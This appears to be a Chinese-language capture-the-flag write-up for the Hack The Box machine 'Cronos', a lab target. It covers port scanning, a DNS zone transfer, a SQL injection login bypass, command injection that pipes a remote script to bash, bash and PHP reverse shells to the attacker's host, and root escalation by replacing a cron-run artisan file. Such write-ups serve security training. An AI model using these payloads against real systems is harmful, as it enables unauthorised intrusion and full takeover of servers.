⚠️ 郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,如果您不同意请关闭该页面!任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
ℹ️ 目标信息
🔍 端口扫描
┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ cat allports.txt # Nmap 7.92 scan initiated Fri Apr 8 22:42:51 2022 as: nmap -v -sS -Pn -p- --max-retries=0 -oN allports.txt -oX allports.xml 10.10.10.13 Warning: 10.10.10.13 giving up on port because retransmission cap hit (0). adjust_timeouts2: packet supposedly had rtt of -1937707 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -1937707 microseconds. Ignoring time. Nmap scan report for admin.cronos.htb (10.10.10.13) Host is up (0.34s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http Read data files from: /usr/bin/../share/nmap # Nmap done at Fri Apr 8 22:51:54 2022 -- 1 IP address (1 host up) scanned in 542.70 seconds
┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ cat nmap.txt # Nmap 7.92 scan initiated Fri Apr 8 22:51:54 2022 as: nmap -sV -sC -p 22,53,80 -Pn -oN nmap.txt -oX nmap.xml 10.10.10.13 Nmap scan report for admin.cronos.htb (10.10.10.13) Host is up (0.29s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA) | 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA) |_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Login Page | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.18 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Apr 8 22:52:12 2022 -- 1 IP address (1 host up) scanned in 17.79 seconds
🤔 情报分析
目标开放了
53 端口,看看里面记录了什么域名┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ dig -x 10.10.10.13 @10.10.10.13 ; <<>> DiG 9.18.0-2-Debian <<>> -x 10.10.10.13 @10.10.10.13 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 64669 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;13.10.10.10.in-addr.arpa. IN PTR ;; ANSWER SECTION: 13.10.10.10.in-addr.arpa. 604800 IN PTR ns1.cronos.htb. ;; AUTHORITY SECTION: 10.10.10.in-addr.arpa. 604800 IN NS ns1.cronos.htb. ;; ADDITIONAL SECTION: ns1.cronos.htb. 604800 IN A 10.10.10.13 ;; Query time: 388 msec ;; SERVER: 10.10.10.13#53(10.10.10.13) (UDP) ;; WHEN: Fri Apr 08 23:06:10 CST 2022 ;; MSG SIZE rcvd: 111 ┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ dig axfr @10.10.10.13 cronos.htb ; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.13 cronos.htb ; (1 server found) ;; global options: +cmd cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 cronos.htb. 604800 IN NS ns1.cronos.htb. cronos.htb. 604800 IN A 10.10.10.13 admin.cronos.htb. 604800 IN A 10.10.10.13 ns1.cronos.htb. 604800 IN A 10.10.10.13 www.cronos.htb. 604800 IN A 10.10.10.13 cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 ;; Query time: 407 msec ;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP) ;; WHEN: Fri Apr 08 23:05:37 CST 2022 ;; XFR size: 7 records (messages 1, bytes 203)
有两个主要的域名
www.cronos.htb. admin.cronos.htb. 在 /etc/hosts 文件中添加解析,访问web看看有什么内容┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters 10.10.10.13 admin.cronos.htb www.cronos.htb
没有什么有用的信息在
www.cronos.htb
看到登录框先试一下万能密码
admin’ — - 
运气不错,成功进入传统的命令行注入了,输入命令尝试攻击
💥 实施攻击
获取 USER.TXT
构造shell文件
┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ cat liona.sh #!/bin/bash /bin/bash -i >& /dev/tcp/10.10.14.26/1234 0>&1
开启http服务
┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
监听端口
┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ nc -nvlp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234
在页面的命令框输入
8.8.8.8; curl 10.10.14.26/liona.sh | bash┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ nc -nvlp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.10.10.13. Ncat: Connection from 10.10.10.13:55854. bash: cannot set terminal process group (1406): Inappropriate ioctl for device bash: no job control in this shell www-data@cronos:/var/www/admin$
成功获得反弹shel
┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ nc -nvlp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.10.10.13. Ncat: Connection from 10.10.10.13:55854. bash: cannot set terminal process group (1406): Inappropriate ioctl for device bash: no job control in this shell www-data@cronos:/var/www/admin$ ls /home ls /home noulis www-data@cronos:/var/www/admin$ cat /home/noulis/user.txt cat /home/noulis/user.txt 51d236438b333970dbba7dc3089be33b www-data@cronos:/var/www/admin$
获取 ROOT.TXT
检测
sudo命令www-data@cronos:/var/www/admin$ sudo sudo usage: sudo -h | -K | -k | -V usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user] usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command] usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] [VAR=value] [-i|-s] [<command>] usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ... www-data@cronos:/var/www/admin$ sudo -l sudo -l sudo: no tty present and no askpass program specified www-data@cronos:/var/www/admin$ python -c "import pty;pty.spawn('/bin/bash')" python -c "import pty;pty.spawn('/bin/bash')" www-data@cronos:/var/www/admin$ sudo -l sudo -l [sudo] password for www-data:
需要密码,尝试一下提权,并检查进程
┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh www-data@cronos:/var/www/admin$ cd /tmp www-data@cronos:/tmp$ curl 10.10.14.26/linpeas.sh | bash
发现
/var/www/laravel/artisan文件会被随时执行www-data@cronos:/var/www/laravel$ ls -al ls -al total 2012 drwxr-xr-x 13 www-data www-data 4096 Apr 9 2017 . drwxr-xr-x 5 root root 4096 Apr 9 2017 .. -rw-r--r-- 1 www-data www-data 572 Apr 9 2017 .env drwxr-xr-x 8 www-data www-data 4096 Apr 9 2017 .git -rw-r--r-- 1 www-data www-data 111 Apr 9 2017 .gitattributes -rw-r--r-- 1 www-data www-data 117 Apr 9 2017 .gitignore -rw-r--r-- 1 www-data www-data 727 Apr 9 2017 CHANGELOG.md drwxr-xr-x 6 www-data www-data 4096 Apr 9 2017 app -rwxr-xr-x 1 www-data www-data 1646 Apr 9 2017 artisan drwxr-xr-x 3 www-data www-data 4096 Apr 9 2017 bootstrap -rw-r--r-- 1 www-data www-data 1300 Apr 9 2017 composer.json -rw-r--r-- 1 www-data www-data 121424 Apr 9 2017 composer.lock -rwxr-xr-x 1 www-data www-data 1836198 Apr 9 2017 composer.phar drwxr-xr-x 2 www-data www-data 4096 Apr 9 2017 config drwxr-xr-x 5 www-data www-data 4096 Apr 9 2017 database -rw-r--r-- 1 www-data www-data 1062 Apr 9 2017 package.json -rw-r--r-- 1 www-data www-data 1055 Apr 9 2017 phpunit.xml drwxr-xr-x 4 www-data www-data 4096 Apr 9 2017 public -rw-r--r-- 1 www-data www-data 3424 Apr 9 2017 readme.md drwxr-xr-x 5 www-data www-data 4096 Apr 9 2017 resources drwxr-xr-x 2 www-data www-data 4096 Apr 9 2017 routes -rw-r--r-- 1 www-data www-data 563 Apr 9 2017 server.php drwxr-xr-x 5 www-data www-data 4096 Apr 9 2017 storage drwxr-xr-x 4 www-data www-data 4096 Apr 9 2017 tests drwxr-xr-x 31 www-data www-data 4096 Apr 9 2017 vendor -rw-r--r-- 1 www-data www-data 555 Apr 9 2017 webpack.mix.js www-data@cronos:/var/www/laravel$
我们拥有权限,那么就使用这个就可以了,在本本地创建PHP攻击文件下载到目的位置
┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ cat artisan <?php echo shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.26/2345 0>&1'") ?> ┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ nc -nvlp 2345 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::2345 Ncat: Listening on 0.0.0.0:2345
www-data@cronos:/var/www/laravel$ wget http://10.10.14.26/artisan wget http://10.10.14.26/artisan --2022-04-08 18:54:38-- http://10.10.14.26/artisan Connecting to 10.10.14.26:80... connected. HTTP request sent, awaiting response... 200 OK Length: 76 [application/octet-stream] Saving to: 'artisan' artisan 100%[===================>] 76 --.-KB/s in 0s 2022-04-08 18:54:39 (15.6 MB/s) - 'artisan' saved [76/76] www-data@cronos:/var/www/laravel$ ls -al ls -al total 2012 drwxr-xr-x 13 www-data www-data 4096 Apr 8 18:54 . drwxr-xr-x 5 root root 4096 Apr 9 2017 .. -rw-r--r-- 1 www-data www-data 572 Apr 9 2017 .env drwxr-xr-x 8 www-data www-data 4096 Apr 9 2017 .git -rw-r--r-- 1 www-data www-data 111 Apr 9 2017 .gitattributes -rw-r--r-- 1 www-data www-data 117 Apr 9 2017 .gitignore -rw-r--r-- 1 www-data www-data 727 Apr 9 2017 CHANGELOG.md drwxr-xr-x 6 www-data www-data 4096 Apr 9 2017 app -rw-r--r-- 1 www-data www-data 76 Apr 8 18:47 artisan drwxr-xr-x 3 www-data www-data 4096 Apr 9 2017 bootstrap -rw-r--r-- 1 www-data www-data 1300 Apr 9 2017 composer.json -rw-r--r-- 1 www-data www-data 121424 Apr 9 2017 composer.lock -rwxr-xr-x 1 www-data www-data 1836198 Apr 9 2017 composer.phar drwxr-xr-x 2 www-data www-data 4096 Apr 9 2017 config drwxr-xr-x 5 www-data www-data 4096 Apr 9 2017 database -rw-r--r-- 1 www-data www-data 1062 Apr 9 2017 package.json -rw-r--r-- 1 www-data www-data 1055 Apr 9 2017 phpunit.xml drwxr-xr-x 4 www-data www-data 4096 Apr 9 2017 public -rw-r--r-- 1 www-data www-data 3424 Apr 9 2017 readme.md drwxr-xr-x 5 www-data www-data 4096 Apr 9 2017 resources drwxr-xr-x 2 www-data www-data 4096 Apr 9 2017 routes -rw-r--r-- 1 www-data www-data 563 Apr 9 2017 server.php drwxr-xr-x 5 www-data www-data 4096 Apr 9 2017 storage drwxr-xr-x 4 www-data www-data 4096 Apr 9 2017 tests drwxr-xr-x 31 www-data www-data 4096 Apr 9 2017 vendor -rw-r--r-- 1 www-data www-data 555 Apr 9 2017 webpack.mix.js www-data@cronos:/var/www/laravel$ chmod +x artisan chmod +x artisan www-data@cronos:/var/www/laravel$
┌──(liona㉿kali)-[~/Workspace/HTB/Cronos] └─$ nc -nvlp 2345 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::2345 Ncat: Listening on 0.0.0.0:2345 Ncat: Connection from 10.10.10.13. Ncat: Connection from 10.10.10.13:38964. bash: cannot set terminal process group (458): Inappropriate ioctl for device bash: no job control in this shell root@cronos:~# cat /root/root.txt cat /root/root.txt 1703b8a3c9a8dde879942c79d02fd3a0 root@cronos:~#
📝 总结
知识点
- 本地提权
- 反弹shell的编写
技巧
- 使用
Python调用完整的PTY环境
- 账号密码先输入万能密码试试
admin’ — -